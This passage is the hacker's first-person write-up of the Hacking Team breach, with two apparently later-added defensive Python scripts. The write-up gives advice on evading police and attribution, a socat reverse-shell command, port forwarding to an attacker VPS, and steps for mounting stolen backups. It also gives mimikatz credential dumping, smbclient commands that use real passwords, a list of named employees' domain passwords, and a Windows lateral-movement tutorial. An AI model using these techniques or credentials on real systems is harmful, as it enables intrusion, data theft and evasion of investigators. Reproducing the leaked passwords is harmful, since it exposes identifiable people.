[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf 
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


--[ 3 - Stay safe out there ]---------------------------------------------------

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

   I guess when the police arrive to seize your computer, it means you've
   already made a lot of mistakes, but it's better to be safe.

2) Use a virtual machine with all traffic routed through Tor

   This accomplishes two things. First, all your traffic is anonymized through
   Tor. Second, keeping your personal life and your hacking on separate
   computers helps you not to mix them by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
   something custom [6]. Here's [7] a detailed comparison.

3) (Optional) Don't connect directly to Tor
   
   Tor isn't a panacea. They can correlate the times you're connected to Tor
   with the times your hacker handle is active. Also, there have been
   successful attacks against Tor [8]. You can connect to Tor using other
   people's wifi. Wifislax [9] is a linux distro with a lot of tools for
   cracking wifi. Another option is to connect to a VPN or a bridge node [10]
   before Tor, but that's less secure because they can still correlate the
   hacker's activity with your house's internet activity (this was used as
   evidence against Jeremy Hammond [11]).

   The reality is that while Tor isn't perfect, it works quite well. When I
   was young and reckless, I did plenty of stuff without any protection (I'm
   referring to hacking) apart from Tor, that the police tried their hardest
   to investigate, and I've never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


----[ 3.1 - Infrastructure ]----------------------------------------------------

I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

   For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

   For use as C&C servers, to receive connect-back shells, to launch attacks,
   and to store the loot.

3) Hacked Servers

   For use as pivots to hide the IP addresses of the stable servers. And for
   when I want a fast connection without pivoting, for example to scan ports,
   scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).


----[ 3.2 - Attribution ]-------------------------------------------------------

In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.

I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
   with new emails, and paid for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.


--[ 4 - Information Gathering ]-------------------------------------------------

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.


----[ 4.1 - Technical Information ]---------------------------------------------

Some tools and techniques are:

1) Google

   A lot of interesting things can be found with a few well-chosen search
   queries. For example, the identity of DPR [1]. The bible of Google hacking
   is the book "Google Hacking for Penetration Testers". You can find a short
   summary in Spanish at [2].

2) Subdomain Enumeration

   Often, a company's main website is hosted by a third party, and you'll find
   the company's actual IP range thanks to subdomains like mx.company.com or
   ns1.company.com. Also, sometimes there are things that shouldn't be exposed
   in "hidden" subdomains. Useful tools for discovering domains and subdomains
   are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

   With a reverse lookup using the whois information from a domain or IP range
   of a company, you can find other domains and IP ranges. As far as I know,
   there's no free way to do reverse lookups aside from a google "hack":
   
   "via della moscova 13" site:www.findip-address.com
   "via della moscova 13" site:domaintools.com

4) Port scanning and fingerprinting

   Unlike the other techniques, this talks to the company's servers. I
   include it in this section because it's not an attack, it's just
   information gathering. The company's IDS might generate an alert, but you
   don't have to worry since the whole internet is being scanned constantly.

   For scanning, nmap [6] is precise, and can fingerprint the majority of
   services discovered. For companies with very large IP ranges, zmap [7] or
   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
   sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


----[ 4.2 - Social Information ]------------------------------------------------

For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

   Here as well, it's the most useful tool.

2) theHarvester and recon-ng

   I already mentioned them in the previous section, but they have a lot more
   functionality. They can find a lot of information quickly and
   automatically. It's worth reading all their documentation.

3) LinkedIn

   A lot of information about the employees can be found here. The company's
   recruiters are the most likely to accept your connection requests.

4) Data.com

   Previously known as jigsaw. They have contact information for many
   employees.

5) File Metadata

   A lot of information about employees and their systems can be found in
   metadata of files the company has published. Useful tools for finding
   files on the company's website and extracting the metadata are metagoofil
   [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


--[ 5 - Entering the network ]--------------------------------------------------

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.


----[ 5.1 - Social Engineering ]------------------------------------------------

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


----[ 5.2 - Buying Access ]-----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of its employees are infosec experts, so there was a low chance that they'd
already been compromised.


----[ 5.3 - Technical Exploitation ]--------------------------------------------

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum:        93.62.139.32 - 93.62.139.47
descr:          HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


--[ 6 - Be Prepared ]-----------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

   For all the standard Unix utilities that the system didn't have.

2) nmap

   To scan and fingerprint Hacking Team's internal network.

3) Responder.py

   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.

4) Python

   To execute Responder.py

5) tcpdump

   For sniffing traffic.

6) dsniff

   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
   and NaGA, but it was hard to compile it for the system.

7) socat

   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
    tcp:my_server:my_port

   And useful for a lot more, it's a networking swiss army knife. See the
   examples section of its documentation.

8) screen

   Like the shell with pty, it wasn't really necessary, but I wanted to feel
   at home in Hacking Team's network.

9) a SOCKS proxy server

   To use with proxychains to be able to access their local network from any
   program.

10) tgcd

   For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.


--[ 7 - Watch and Listen ]------------------------------------------------------

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.


--[ 8 - NoSQL Databases ]-------------------------------------------------------

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_    version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


--[ 9 - Crossed Cables ]--------------------------------------------------------

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
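The two findings above (a MongoDB that lists its databases to anyone who connects, and an iSCSI target exported with no authentication) are exactly what a defender should be scanning their own network for. The following Python script is an added example, not code from the original write-up or from nmap: it parses nmap's normal text output and reports both conditions. SAMPLE_SCAN is constructed and modelled on the scan output quoted in sections 8 and 9; the hostnames and addresses in it are made up, and the third host shows what an authenticated MongoDB (error code 13, "not authorized") and a CHAP-protected target look like so the script has something to leave alone.

```python
"""Audit nmap text output for storage services that answered without credentials.

Added example, not code from the original write-up or from nmap: it reads
nmap's normal (-oN) output and flags MongoDB instances whose
mongodb-databases script got a successful listDatabases reply ("ok = 1")
from an anonymous client, and iSCSI targets whose iscsi-info script
reported "No authentication required". Hosts, names and addresses in
SAMPLE_SCAN are constructed, modelled on the scans quoted above.
"""
import re
from dataclasses import dataclass

SAMPLE_SCAN = """\
Nmap scan report for rcs-test.example.local (192.168.100.10)
27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|_    version = 2.6.5

Nmap scan report for nas1.example.local (192.168.200.66)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas1.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for hardened.example.local (192.168.200.80)
27017/tcp open  mongodb       MongoDB 3.0.0
| mongodb-databases:
|   code = 13
|   ok = 0
|_    errmsg = not authorized on admin to execute command
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas2.name
|_    Authentication: CHAP required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_RE = re.compile(r"^\|_? ([\w-]+):$")      # "| mongodb-databases:"
OUTPUT_RE = re.compile(r"^\|_?\s+(.*)$")          # indented script output line


@dataclass
class Finding:
    host: str
    port: str
    service: str
    reason: str


def parse_nmap(text):
    """Map (host, port) -> {"service": str, "scripts": {name: [lines]}}."""
    ports = {}
    host = port = script = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if m := HOST_RE.match(line):
            host = m.group(2) or m.group(1)   # prefer the IP when nmap prints one
            port = script = None
        elif (m := PORT_RE.match(line)) and host:
            port = f"{m.group(1)}/{m.group(2)}"
            ports[(host, port)] = {"service": m.group(4), "scripts": {}}
            script = None
        elif line.startswith("|") and port:
            if m := SCRIPT_RE.match(line):
                script = m.group(1)
                ports[(host, port)]["scripts"][script] = []
            elif (m := OUTPUT_RE.match(line)) and script:
                ports[(host, port)]["scripts"][script].append(m.group(1).strip())
    return ports


def audit(text):
    """Return a Finding for every port whose script output shows anonymous access."""
    findings = []
    for (host, port), info in parse_nmap(text).items():
        scripts = info["scripts"]
        # listDatabases succeeded for a client that never authenticated
        if "ok = 1" in scripts.get("mongodb-databases", []):
            findings.append(Finding(host, port, info["service"],
                            "MongoDB listed its databases to an unauthenticated client"))
        # the target advertises that no CHAP (or other) authentication is needed
        iscsi = scripts.get("iscsi-info", [])
        if any(l.startswith("Authentication: No authentication") for l in iscsi):
            findings.append(Finding(host, port, info["service"],
                            "iSCSI target exported without authentication"))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SCAN):
        print(f"{f.host} {f.port} ({f.service}): {f.reason}")
```

Run it against a real `nmap -sV --script mongodb-databases,iscsi-info -oN scan.txt` of your own ranges; every hit is either a database that needs `security.authorization` turned on or a LUN that needs CHAP and a dedicated storage VLAN, which is what the Hacking Team documentation said their setup already had.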

iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1.

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big to download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


--[ 10 - From backups to domain admin ]-----------------------------------------

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      <---- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


--[ 11 - Downloading the mail ]-------------------------------------------------

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


--[ 12 - Downloading Files ]----------------------------------------------------

Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.


--[ 13 - Introduction to hacking windows domains ]------------------------------

Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.


----[ 13.1 - Lateral Movement ]-------------------------------------------------

I'll give a brief review of the different techniques for spreading within a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote Movement:

1) psexec

   The tried and true method for lateral movement on windows. You can use
   psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
   invoke_psexec [4], or the builtin windows command "sc" [5]. For the
   metasploit module, powershell empire, and pth-winexe [6], you just need the
   hash, not the password. It's the most universal method (it works on any
   windows computer with port 445 open), but it's also the least stealthy.
   Event type 7045 "Service Control Manager" will appear in the event logs. In
   my experience, no one has ever noticed during a hack, but it helps the
   investigators piece together what the hacker did afterwards.

2) WMI

   The most stealthy method. The WMI service is enabled on all windows
   computers, but except for servers, the firewall blocks it by default. You
   can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
   pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
   wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

   It's disabled by default, and I don't recommend enabling new protocols.
   But, if the sysadmin has already enabled it, it's very convenient,
   especially if you use powershell for everything (and you should use
   powershell for almost everything, it will change [11] with powershell 5 and
   windows 10, but for now powershell makes it easy to do everything in RAM,
   avoid AV, and leave a small footprint)

4) Scheduled Tasks

   You can execute remote programs with at and schtasks [5]. It works in the
   same situations where you could use psexec, and it also leaves a well known
   footprint [12].

5) GPO

   If all those protocols are disabled or blocked by the firewall, once you're
   Domain Admin, you can use GPO to give users a login script, install an msi,
   execute a scheduled task [13], or, like we'll see with the computer of
   Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
   open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
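The psexec item above notes that every service-based remote execution leaves Event ID 7045 in the System log, and that investigators rely on it afterwards. Turning that footprint into a live alert is straightforward, and the following Python script is an added example of doing so; it is not code from the original write-up or from any tool it names. The records in SAMPLE_EVENTS are constructed. The patterns it looks for are assumptions stated as heuristics: the well-known `PSEXESVC` service name of Sysinternals PsExec, a service whose ImagePath is really a `%COMSPEC%`/PowerShell launcher with an encoded command (the psexec_psh style), binaries dropped in temporary or user-writable locations, and eight-letter random-looking service names.

```python
"""Flag suspicious service installations (System log, Event ID 7045).

Added example, not part of the original write-up. SAMPLE_EVENTS is a
constructed export of System-log records (the fields a 7045 event carries:
ServiceName, ImagePath, ServiceType, StartType, AccountName). The rules are
heuristics a defender would tune against a baseline of their own services.
"""
import json
import re

SAMPLE_EVENTS = json.dumps([
    {"EventID": 7045, "Computer": "WS01.example.local", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "ServiceType": "user mode service",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "SRV02.example.local", "ServiceName": "uUYbWqzx",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgA...",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "SRV03.example.local", "ServiceName": "BackupAgent",
     "ImagePath": "\"C:\\Program Files\\Backup Agent\\agent.exe\" /service",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "SRV03.example.local", "ServiceName": "BackupAgent"},
])

# Service names used by well-known remote-execution tools (assumed list).
KNOWN_TOOL_RE = re.compile(r"^(psexesvc|paexec)$", re.I)
# A "service binary" that is actually a shell or script host.
LAUNCHER_RE = re.compile(r"(comspec|cmd\.exe|powershell|pwsh|rundll32|regsvr32|mshta|wscript|cscript)", re.I)
# PowerShell encoded-command switches.
ENCODED_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
# Locations a legitimate service binary rarely lives in.
DROP_DIR_RE = re.compile(r"(\\temp\\|\\tmp\\|\\users\\|\\programdata\\|\\perflogs\\|admin\$)", re.I)


def looks_random(name):
    """Heuristic for generated names: exactly 8 letters, upper and lower case
    mixed after the first character, at most two vowels. CamelCase product
    names (BackupAgent) and normal Windows names (Dnscache) do not match."""
    if not re.fullmatch(r"[A-Za-z]{8}", name):
        return False
    tail = name[1:]
    mixed = any(c.isupper() for c in tail) and any(c.islower() for c in tail)
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return mixed and vowels <= 2


def suspicious_service_installs(events_json):
    """Return one record per 7045 event that trips at least one heuristic."""
    findings = []
    for ev in json.loads(events_json):
        if ev.get("EventID") != 7045:
            continue
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        reasons = []
        if KNOWN_TOOL_RE.match(name):
            reasons.append("known remote-execution tool service name")
        if LAUNCHER_RE.search(path):
            reasons.append("ImagePath runs a shell or script host, not a service binary")
        if ENCODED_RE.search(path):
            reasons.append("encoded PowerShell command in ImagePath")
        if DROP_DIR_RE.search(path):
            reasons.append("binary in a temporary or user-writable location")
        if looks_random(name):
            reasons.append("random-looking 8-letter service name")
        if reasons:
            findings.append({"computer": ev.get("Computer"), "service": name,
                             "image_path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in suspicious_service_installs(SAMPLE_EVENTS):
        print(hit["computer"], hit["service"], "->", "; ".join(hit["reasons"]))
```

Feed it the 7045 events forwarded from workstations and member servers (a SIEM export or `Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}` converted to JSON) and whitelist your own agents by name and path. The same event fires for scheduled-task style tools that install a service, so it is a cheap first alert on most of the remote-movement methods listed above, WMI being the notable exception.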


"In place" Movement:

1) Token Stealing

   Once you have admin access on a computer, you can use the tokens of the
   other users to access resources in the domain. Two tools for doing this are
   incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

   You can take advantage of a validation bug in Kerberos to generate Domain
   Admin tickets [3][4][5].

3) Pass the Hash

   If you have a user's hash, but they're not logged in, you can use
   sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

   Any RAT can inject itself into other processes. For example, the migrate
   command in meterpreter and pupy [6], or the psinject [7] command in
   powershell empire. You can inject into the process that has the token you
   want.

5) runas

   This is sometimes very useful since it doesn't require admin privileges.
